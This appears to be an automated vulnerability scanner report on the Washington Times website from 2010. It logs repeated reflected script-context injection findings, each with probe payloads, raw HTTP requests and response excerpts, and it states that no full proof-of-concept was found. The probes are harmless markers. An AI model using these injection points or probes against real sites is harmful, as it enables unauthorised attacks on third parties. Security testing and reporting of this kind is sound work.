Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf4ee5"%3b213eb5b013a/collection/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14584
Date: Mon, 13 Dec 2010 21:33:51 GMT
X-Varnish: 570584542
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf4ee5";213eb5b013a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10bd4'%3b87381896288 was submitted in the REST URL parameter 1. This input was echoed as 10bd4';87381896288 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia10bd4'%3b87381896288/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:36:27 GMT
X-Varnish: 570588367
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f042a"%3b347460cf205 was submitted in the REST URL parameter 1. This input was echoed as f042a";347460cf205 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf042a"%3b347460cf205/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:36:25 GMT
X-Varnish: 570588103
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf042a";347460cf205"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9f3f'%3b23dbb89be6d was submitted in the REST URL parameter 1. This input was echoed as c9f3f';23dbb89be6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediac9f3f'%3b23dbb89be6d/collection/child-hostages-freed-france/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14783
Date: Mon, 13 Dec 2010 21:36:46 GMT
X-Varnish: 570588901
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39f30"%3bf3fb16fabe1 was submitted in the REST URL parameter 1. This input was echoed as 39f30";f3fb16fabe1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia39f30"%3bf3fb16fabe1/collection/child-hostages-freed-france/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:36:45 GMT
X-Varnish: 570588863
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia39f30";f3fb16fabe1"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0dd6"%3b01d88764aa8 was submitted in the REST URL parameter 1. This input was echoed as f0dd6";01d88764aa8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf0dd6"%3b01d88764aa8/collection/fire-kills-81-chile-prison/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:36:57 GMT
X-Varnish: 570589183
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf0dd6";01d88764aa8"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7dca'%3ba843c824d6f was submitted in the REST URL parameter 1. This input was echoed as a7dca';a843c824d6f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaa7dca'%3ba843c824d6f/collection/fire-kills-81-chile-prison/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14789
Date: Mon, 13 Dec 2010 21:37:29 GMT
X-Varnish: 570589751
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed9d"%3b9381ad3566f was submitted in the REST URL parameter 1. This input was echoed as 4ed9d";9381ad3566f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia4ed9d"%3b9381ad3566f/collection/house-packed-explosives-burned/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14766
Date: Mon, 13 Dec 2010 21:36:29 GMT
X-Varnish: 570588239
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia4ed9d";9381ad3566f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bd69'%3bbd32cc61678 was submitted in the REST URL parameter 1. This input was echoed as 4bd69';bd32cc61678 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia4bd69'%3bbd32cc61678/collection/house-packed-explosives-burned/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14584
Date: Mon, 13 Dec 2010 21:36:39 GMT
X-Varnish: 570588457
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f471d"%3b23a1b9be349 was submitted in the REST URL parameter 1. This input was echoed as f471d";23a1b9be349 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf471d"%3b23a1b9be349/collection/kosovo-election/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14598
Date: Mon, 13 Dec 2010 21:36:12 GMT
X-Varnish: 570587699
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf471d";23a1b9be349"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc91'%3b642c302c34 was submitted in the REST URL parameter 1. This input was echoed as acc91';642c302c34 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaacc91'%3b642c302c34/collection/kosovo-election/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14579
Date: Mon, 13 Dec 2010 21:36:22 GMT
X-Varnish: 570588238
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2104e"%3b3b68dee159f was submitted in the REST URL parameter 1. This input was echoed as 2104e";3b68dee159f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia2104e"%3b3b68dee159f/collection/obamas-celebrate-christmas-washington/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14789
Date: Mon, 13 Dec 2010 21:35:24 GMT
X-Varnish: 570586757
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="multimedia2104e";3b68dee159f";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd418'%3bf7f2b7bd26 was submitted in the REST URL parameter 1. This input was echoed as cd418';f7f2b7bd26 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediacd418'%3bf7f2b7bd26/collection/obamas-celebrate-christmas-washington/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14754
Date: Mon, 13 Dec 2010 21:35:34 GMT
X-Varnish: 570586978
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b087a"%3b6a043aeed85 was submitted in the REST URL parameter 1. This input was echoed as b087a";6a043aeed85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediab087a"%3b6a043aeed85/collection/pope-inaugurates-christmas-season/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14766
Date: Mon, 13 Dec 2010 21:35:51 GMT
X-Varnish: 570587376
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="multimediab087a";6a043aeed85";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c974'%3bc5298f5f6f7 was submitted in the REST URL parameter 1. This input was echoed as 9c974';c5298f5f6f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia9c974'%3bc5298f5f6f7/collection/pope-inaugurates-christmas-season/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14783
Date: Mon, 13 Dec 2010 21:36:00 GMT
X-Varnish: 570587624
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9212'%3b757bae76bf4 was submitted in the REST URL parameter 1. This input was echoed as d9212';757bae76bf4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediad9212'%3b757bae76bf4/collection/redskins-fall-tampa-17-16/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14584
Date: Mon, 13 Dec 2010 21:35:51 GMT
X-Varnish: 570587381
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4f2b"%3b69f3641b902 was submitted in the REST URL parameter 1. This input was echoed as b4f2b";69f3641b902 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediab4f2b"%3b69f3641b902/collection/redskins-fall-tampa-17-16/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14766
Date: Mon, 13 Dec 2010 21:35:39 GMT
X-Varnish: 570587141
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="multimediab4f2b";69f3641b902";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d513a'%3b706034b269f was submitted in the REST URL parameter 1. This input was echoed as d513a';706034b269f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediad513a'%3b706034b269f/collection/students-protest-british-tuition-hike-plan/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14584
Date: Mon, 13 Dec 2010 21:36:44 GMT
X-Varnish: 570588824
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcb2b"%3b7e35a163e9e was submitted in the REST URL parameter 1. This input was echoed as dcb2b";7e35a163e9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediadcb2b"%3b7e35a163e9e/collection/students-protest-british-tuition-hike-plan/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14759
Date: Mon, 13 Dec 2010 21:36:36 GMT
X-Varnish: 570588606
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="multimediadcb2b";7e35a163e9e";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28988'%3bbf2088cd9ba was submitted in the REST URL parameter 1. This input was echoed as 28988';bf2088cd9ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia28988'%3bbf2088cd9ba/collection/sweden-bombing-suspect-named/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14598
Date: Mon, 13 Dec 2010 21:36:05 GMT
X-Varnish: 570587730
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eb27"%3bcf2a1768b3f was submitted in the REST URL parameter 1. This input was echoed as 5eb27";cf2a1768b3f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia5eb27"%3bcf2a1768b3f/collection/sweden-bombing-suspect-named/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14598
Date: Mon, 13 Dec 2010 21:36:02 GMT
X-Varnish: 570587648
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="multimedia5eb27";cf2a1768b3f";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a91'%3b70ac571c839 was submitted in the REST URL parameter 1. This input was echoed as 24a91';70ac571c839 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia24a91'%3b70ac571c839/image/todays-newspaper-dec-13-2010/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
